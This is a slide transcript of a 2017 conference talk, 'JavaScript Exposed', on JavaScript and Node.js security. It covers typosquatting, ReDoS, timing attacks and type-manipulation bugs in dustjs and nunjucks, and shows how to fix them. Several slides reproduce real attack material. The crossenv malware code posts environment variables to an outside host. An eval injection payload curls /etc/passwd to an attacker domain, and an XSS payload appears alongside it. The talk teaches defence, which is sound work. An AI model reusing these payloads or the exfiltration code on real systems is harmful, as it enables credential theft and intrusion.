Upgrade to Pro — share decks privately, control downloads, hide ads and more …

JavaScript Exposed at Midwest JS

Tim Kadlec
August 17, 2017
Technology
3
250

JavaScript Exposed at Midwest JS

Thanks to the a vibrant ecosystem and server-side runtimes like Node.js, our sites and applications are using more JavaScript than ever before. With so much JavaScript tied to critical functionality, understanding the security implications of that JavaScript is absolutely crucial so that we're not leaving our businesses, and our users, exposed.

In this talk, we'll go through some of the more interesting security JavaScript vulnerabilities so that we can see how they work, what they can impact, and most importantly, how to fix them.

Presented at MidwestJS in Minneapolis on August 17, 2017.

Tim Kadlec

August 17, 2017
Tweet

More Decks by Tim Kadlec

See All by Tim Kadlec
The State of Node.js Security, at Node.js Interactive 2017
tkadlec
1
220
Focusing On What Matters, at Fluent, 2017
tkadlec
0
100
Once More, With Feeling at Code 2016 in Sydney
tkadlec
1
500
Once More, With Feeling
tkadlec
9
1.5k
Mobile Image Processing at London Web Perf Meetup, 2016
tkadlec
1
160
Better By Proxy at Velocity NY 2015
tkadlec
3
490
Getting Started with Performance Budgets at HighEdWeb Technical Academy, 2015
tkadlec
9
1k
Reaching Everyone, Fast at From the Front, 2015
tkadlec
8
6.4k
Better by Proxy at Smashing Conf NY
tkadlec
2
790

Other Decks in Technology

See All in Technology
AWS 初心者が取り組んだセキュリティ強化の2年間とこれから/Two years of security enhancement efforts by AWS beginners and the future
yayoi_dd
0
310
【IoT-Tech Meetup #5】WireGuardを動かす環境やハードウェア紹介
soracom
PRO
0
140
Oracle Cloud Infrastructure データベース・クラウド:各バージョンのサポート期間
oracle4engineer
PRO
6
4.2k
Customer-Centricity Unleashed: Transforming Businesses with LINE Tech
linedevth
0
130
テンションも揚げてこう! Ebitengine開発
lapis2411
0
260
Priorityを制するものはローディングを制す
edwardkenfox
4
310
サービスへの影響を抑えてデータベースの移行を実施したはなし Aurora MySQL -> Cloud SQL
pistatium
0
220
Renovate を使った ライブラリアップデート 仕組み化の取り組み
andpad
0
210
ChatGPTの10ヶ月と開発トレンドの現在地
hirosatogamo
5
670
ログから学ぶgo build
nasa_desu
0
260
Case Studies: Modern Development Practices In Highly Regulated Environments
charity
1
680
セキュアエレメントによるWireGuardのセキュリティ強化
kmwebnet
0
140

Featured

See All Featured
The Brand Is Dead. Long Live the Brand.
mthomps
48
5.1k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
318
20k
Put a Button on it: Removing Barriers to Going Fast.
kastner
56
2.7k
Side Projects
sachag
450
39k
KATA
mclloyd
13
11k
Six Lessons from altMBA
skipperchong
17
2.6k
Code Review Best Practice
trishagee
53
13k
Building an army of robots
kneath
300
41k
How GitHub (no longer) Works
holman
300
140k
Scaling GitHub
holman
455
140k
Building Your Own Lightsaber
phodgson
97
5.2k
Unsuck your backbone
ammeep
660
56k

Transcript

  1. JAVASCRIPT
    EXPOSED
    Tim Kadlec | @tkadlec

    View Slide

  2. View Slide

  3. TYPOSQUATTING

    View Slide

  4. View Slide

  5. {
    "name": "crossenv",
    "version": "6.1.1",
    "description": "Run scripts that set and use environment variables across
    platforms",
    "main": "index.js",
    "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "postinstall": "node package-setup.js"
    },
    "author": "Kent C. Dodds (http://kentcdodds.com/)",
    "license": "ISC",
    "dependencies": {
    "cross-env": "^5.0.1"
    }
    }

    View Slide

  6. {
    "name": "crossenv",
    "version": "6.1.1",
    "description": "Run scripts that set and use environment variables across
    platforms",
    "main": "index.js",
    "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "postinstall": "node package-setup.js"
    },
    "author": "Kent C. Dodds (http://kentcdodds.com/)",
    "license": "ISC",
    "dependencies": {
    "cross-env": "^5.0.1"
    }
    }

    View Slide

  7. const host = 'npm.hacktask.net';
    const env = JSON.stringify(process.env);
    const data = new Buffer(env).toString('base64');
    const postData = querystring.stringify({ data });
    const options = {
    hostname: host,
    port: 80,
    path: '/log',
    method: 'POST',
    headers: {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Content-Length': Buffer.byteLength(postData);
    }
    };
    const req = http.request(options);
    req.write(postData);
    req.end();

    View Slide

  8. const host = 'npm.hacktask.net';
    const env = JSON.stringify(process.env);
    const data = new Buffer(env).toString('base64');
    const postData = querystring.stringify({ data });
    const options = {
    hostname: host,
    port: 80,
    path: '/log',
    method: 'POST',
    headers: {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Content-Length': Buffer.byteLength(postData);
    }
    };
    const req = http.request(options);
    req.write(postData);
    req.end();

    View Slide

  9. const host = 'npm.hacktask.net';
    const env = JSON.stringify(process.env);
    const data = new Buffer(env).toString('base64');
    const postData = querystring.stringify({ data });
    const options = {
    hostname: host,
    port: 80,
    path: '/log',
    method: 'POST',
    headers: {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Content-Length': Buffer.byteLength(postData);
    }
    };
    const req = http.request(options);
    req.write(postData);
    req.end();

    View Slide

  10. View Slide

  11. View Slide

  12. View Slide

  13. View Slide

  14. CAN YOU TRUST
    THIRD-PARTY CODE?

    View Slide

  15. THE RISK OF
    ABSTRACTIONS

    View Slide

  16. ~83% FIND A
    VULNERABILITY

    View Slide

  17. View Slide

  18. var request = new XMLHttpRequest();
    request.open('GET', '/my/url', true);
    request.onload = function() {
    if (request.status >= 200 && request.status < 400) {
    // Success!
    var data = JSON.parse(request.responseText);
    } else {
    // Error!
    }
    };
    request.onerror = function() {
    // Something went wrong
    };
    request.send();

    View Slide

  19. var request = new XMLHttpRequest();
    request.open('GET', '/my/url', true);
    request.onload = function() {
    if (request.status >= 200 && request.status < 400) {
    // Success!
    var data = JSON.parse(request.responseText);
    } else {
    // Error!
    }
    };
    request.onerror = function() {
    // Something went wrong
    };
    request.send();
    }

    View Slide

  20. var request = new XMLHttpRequest();
    request.open('GET', '/my/url', true);
    request.onload = function() {
    if (request.status >= 200 && request.status < 400) {
    // Success!
    var data = JSON.parse(request.responseText);
    } else {
    // Error!
    }
    };
    request.onerror = function() {
    // Something went wrong
    };
    request.send();
    }

    View Slide

  21. var request = new XMLHttpRequest();
    request.open('GET', '/my/url', true);
    request.onload = function() {
    if (request.status >= 200 && request.status < 400) {
    // Success!
    var data = JSON.parse(request.responseText);
    } else {
    // Error!
    }
    };
    request.onerror = function() {
    // Something went wrong
    };
    request.send();
    }

    View Slide

  22. var request = new XMLHttpRequest();
    request.open('GET', '/my/url', true);
    request.onload = function() {
    if (request.status >= 200 && request.status < 400) {
    // Success!
    var data = JSON.parse(request.responseText);
    } else {
    // Error!
    }
    };
    request.onerror = function() {
    // Something went wrong
    };
    request.send();
    }

    View Slide

  23. var request = new XMLHttpRequest();
    request.open('GET', '/my/url', true);
    request.onload = function() {
    if (request.status >= 200 && request.status < 400) {
    // Success!
    var data = JSON.parse(request.responseText);
    } else {
    // Error!
    }
    };
    request.onerror = function() {
    // Something went wrong
    };
    request.send();
    }

    View Slide

  24. $.getJSON('/my/url', {})
    .done(function(){
    // Success!
    })
    .fail(function(){
    // Error!
    });

    View Slide

  25. var request = new XMLHttpRequest();
    request.open('GET', '/my/url', true);
    request.onload = function() {
    if (request.status >= 200 && request.status < 400) {
    // Success!
    var data = JSON.parse(request.responseText);
    } else {
    // Error!
    }
    };
    request.onerror = function() {
    // Something went wrong
    };
    request.send();
    }

    View Slide

  26. $.getJSON('/my/url', {})
    .done(function(){
    // Success!
    })
    .fail(function(){
    // Error!
    });

    View Slide

  27. $.get('/my/url', {});

    View Slide

  28. JS fatigue

    View Slide

  29. JS fatigue

    View Slide

  30. JS fatigue

    View Slide

  31. CAN YOU TRUST
    THIRD-PARTY CODE?

    View Slide

  32. CAN YOU TRUST
    CODE?

    View Slide

  33. View Slide

  34. HACKED
    WILL BE
    HACKED

    View Slide

  35. HACKED
    WILL BE
    HACKED

    View Slide

  36. 20-30
    bugs per 1,000 lines of code

    View Slide

  37. 77%
    USE A VULNERABLE JS LIBRARY

    View Slide

  38. NOT GREAT
    BUT FIXABLE

    View Slide

  39. EVERYONE’S
    RESPONSIBILITY

    View Slide

  40. WEAKNESSES
    IN THE LANGUAGE & ECOSYSTEM

    View Slide

  41. THE
    EVENT LOOP

    View Slide

  42. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    first();
    console.log("How's it going?");
    };
    second();

    View Slide

  43. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    first();
    console.log("How's it going?");
    };
    second();

    View Slide

  44. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    first();
    console.log("How's it going?");
    };
    second();
    second()

    View Slide

  45. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    first();
    console.log("How's it going?");
    };
    second();
    second()

    View Slide

  46. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    first();
    console.log("How's it going?");
    };
    second();
    second()
    first()

    View Slide

  47. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    first();
    console.log("How's it going?");
    };
    second();
    second()
    first()

    View Slide

  48. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    first();
    console.log("How's it going?");
    };
    second();
    second()

    View Slide

  49. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    first();
    console.log("How's it going?");
    };
    second();
    second()

    View Slide

  50. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    first();
    console.log("How's it going?");
    };
    second();

    View Slide

  51. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();

    View Slide

  52. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();

    View Slide

  53. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();
    second()

    View Slide

  54. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();
    second()

    View Slide

  55. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();
    second()
    setTimeout()

    View Slide

  56. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();
    second()
    0ms, console.log

    View Slide

  57. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();
    second() console.log

    View Slide

  58. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();
    second() console.log

    View Slide

  59. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();
    second()
    first()
    console.log

    View Slide

  60. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();
    second()
    first()
    console.log

    View Slide

  61. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();
    second() console.log

    View Slide

  62. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();
    second() console.log

    View Slide

  63. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();
    console.log

    View Slide

  64. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();
    console.log

    View Slide

  65. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();
    console.log

    View Slide

  66. var first = function(){
    console.log('Hey Midwest JS');
    };
    var second = function(){
    setTimeout(function(){
    console.log("How's it going?");
    }, 0);
    first();
    };
    second();

    View Slide

  67. View Slide

  68. ReDoS
    REGULAR EXPRESSION DENIAL OF SERVICE

    View Slide

  69. var regex = /A(B|C+)+D/;

    View Slide

  70. var regex = /A(B|C+)+D/;
    A

    View Slide

  71. var regex = /A(B|C+)+D/;
    (B|C+)

    View Slide

  72. var regex = /A(B|C+)+D/;
    +

    View Slide

  73. var regex = /A(B|C+)+D/;
    D

    View Slide

  74. var regex = /A(B|C+)+D/;
    ABBD
    ABCCCCD
    ABCBCCCD
    ACCCCCD

    View Slide

  75. View Slide

  76. View Slide

  77. View Slide

  78. View Slide

  79. ACCCX
    CCC
    CC+C
    C+CC
    C+C+C
    var regex = /A(B|C+)+D/;

    View Slide

  80. String Number of C’s Number of Steps
    ACCCX 3 38
    ACCCCX 4 71
    ACCCCCX 5 136
    ACCCCCCCCCCCCCCX 14 65,553

    View Slide

  81. View Slide

  82. moment().format('MMM Do YY');

    View Slide

  83. moment().format('MMM Do YY');
    var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+)
    +MMMM?/;

    View Slide

  84. moment().format('MMM Do YY');
    var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+)
    +MMMM?/;
    \s+)

    View Slide

  85. m().format("D MMN
    MMMM");
    var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+)
    +MMMM?/;

    View Slide

  86. var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+)
    +MMMM?/;

    View Slide

  87. var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s
    +)MMMM?/;

    View Slide

  88. View Slide

  89. TIMING ATTACK

    View Slide

  90. function isAdminToken(token)
    {
    var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a-
    e6d0ddb8bbba";
    if (token == ADMIN_UUID) {
    return true;
    }
    return false;
    }

    View Slide

  91. function isAdminToken(token)
    {
    var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a-
    e6d0ddb8bbba";
    if (token == ADMIN_UUID) {
    return true;
    }
    return false;
    }
    token == ADMIN_UUID

    View Slide

  92. foo == bar

    View Slide

  93. foo == bar
    f b

    View Slide

  94. foo == fox

    View Slide

  95. foo == fox
    f f

    View Slide

  96. foo == fox
    fo fo

    View Slide

  97. foo == fox
    foo fox

    View Slide

  98. function isAdminToken(token)
    {
    var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a-
    e6d0ddb8bbba";
    if (token == ADMIN_UUID) {
    return true;
    }
    return false;
    }

    View Slide

  99. function isAdminToken(token)
    {
    var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a-
    e6d0ddb8bbba";
    var mismatch = 0;
    for (var i = 0; i < token.length; ++i) {
    mismatch |= (token.charCodeAt(i) ^
    ADMIN_UUID.charCodeAt(i));
    }
    return mismatch;
    }

    View Slide

  100. DYNAMIC
    TYPING

    View Slide

  101. var foo = true;
    foo = 1;
    foo = "hotdogs";

    View Slide

  102. TYPE MANIPULATION

    View Slide

  103. View Slide

  104. {@if cond="'{device}' == 'desktop'"}
    Desktop version
    {:else}
    Mobile Version
    {/if}

    View Slide

  105. "if": function( chunk, context, bodies, params ){
    ...
    var cond = params.cond;
    cond = dust.helpers.tap(cond, chunk,
    context);
    // eval expressions with given dust
    references
    if(eval(cond)){
    ...
    }
    }

    View Slide

  106. NEVER TRUST
    USER INPUT

    View Slide

  107. dust.escapeHtml = function(s) {
    if (typeof s === 'string') {
    if (!HCHARS.test(s)) {
    return s;
    }
    return s.replace(AMP,'&').replace(...) //
    more char replacements
    }
    return s;
    }

    View Slide

  108. dust.escapeHtml = function(s) {
    if (typeof s === 'string') {
    if (!HCHARS.test(s)) {
    return s;
    }
    return s.replace(AMP,'&').replace(...) //
    more char replacements
    }
    return s;
    }

    View Slide

  109. View Slide

  110. qs.parse('a'); // {a : ''}

    View Slide

  111. qs.parse('a'); // {a : ''}
    qs.parse('a=foo'); // {a : 'foo'}

    View Slide

  112. qs.parse('a'); // {a : ''}
    qs.parse('a=foo'); // {a : 'foo'}
    qs.parse('a=foo&b=bar'); // {a : 'foo', b: ‘bar'}

    View Slide

  113. qs.parse('a'); // {a : ''}
    qs.parse('a=foo'); // {a : 'foo'}
    qs.parse('a=foo&b=bar'); // {a : 'foo', b: ‘bar'}
    qs.parse('a=foo&a=bar'); // {a : ['foo', 'bar']}

    View Slide

  114. qs.parse('a'); // {a : ''}
    qs.parse('a=foo'); // {a : 'foo'}
    qs.parse('a=foo&b=bar'); // {a : 'foo', b: ‘bar'}
    qs.parse('a=foo&a=bar'); // {a : ['foo', 'bar']}
    qs.parse('a[]=foo'); // {a : ['foo']}

    View Slide

  115. https://host/demo?device[]=&device[]=

    View Slide

  116. https://host/demo?device[]=&device[]=
    { device: [ '', '' ] }

    View Slide

  117. https://host/demo?device[]=x&device[]=y'-
    require('child_process').exec(‘curl+-F
    +"x=`cat+/etc/passwd`"+artsploit.com')-'
    eval("'xy'-
    require('child_process').exec('curl -F
    \"x=`cat /etc/passwd`\" attacker.com')-''
    == 'desktop'");

    View Slide

  118. DISALLOW
    DISALLOW NON-STRING PARAMETERS

    View Slide

  119. NORMALIZE
    CONVERT TO SINGLE INPUT TYPE

    View Slide

  120. CUSTOM HANDLING
    SPECIFIC HANDLING FOR ALLOWED TYPES

    View Slide

  121. dust.escapeHtml = function(s) {
    if (typeof s === 'string') {
    if (!HCHARS.test(s)) {
    return s;
    }
    return s.replace(AMP,'&').replace(...) //
    more char replacements
    }
    return s;
    }

    View Slide

  122. dust.escapeHtml = function(s) {
    if (typeof s === "string" || (s && typeof
    s.toString === "function")) {
    if (typeof s !== "string") {
    s = s.toString();
    }
    if (!HCHARS.test(s)) {
    return s;
    }
    }
    };

    View Slide

  123. View Slide

  124. nunjucks.renderString(
    'Hello ',
    {username: ‘alert(1)' });

    View Slide

  125. nunjucks.renderString(
    'Hello ',
    {username: ‘alert(1)' });
    Hello <script>alert(1)<script>

    View Slide

  126. escape: function(str) {
    if(typeof str === 'string') {
    return r.markSafe(lib.escape(str));
    }
    return str;
    }

    View Slide

  127. escape: function(str) {
    if(typeof str === 'string') {
    return r.markSafe(lib.escape(str));
    }
    return str;
    }

    View Slide

  128. http://host/?username[]=alert(1)</<br/>script>matt<br/>nunjucks.renderString(<br/>'Hello ',<br/>{username: ['<script>alert(1)</<br/>script>matt'] });<br/>

    View Slide

  129. if(autoescape && !(val instanceof
    SafeString)) {
    val = lib.escape(val.toString());
    }

    View Slide

  130. KNOW WHAT HAPPENS
    UNDER THE HOOD

    View Slide

  131. FOUNDATIONAL
    KNOWLEDGE & CREATIVITY

    View Slide

  132. NOT GREAT
    BUT FIXABLE

    View Slide

  133. THANK YOU
    Tim Kadlec | @tkadlec

    View Slide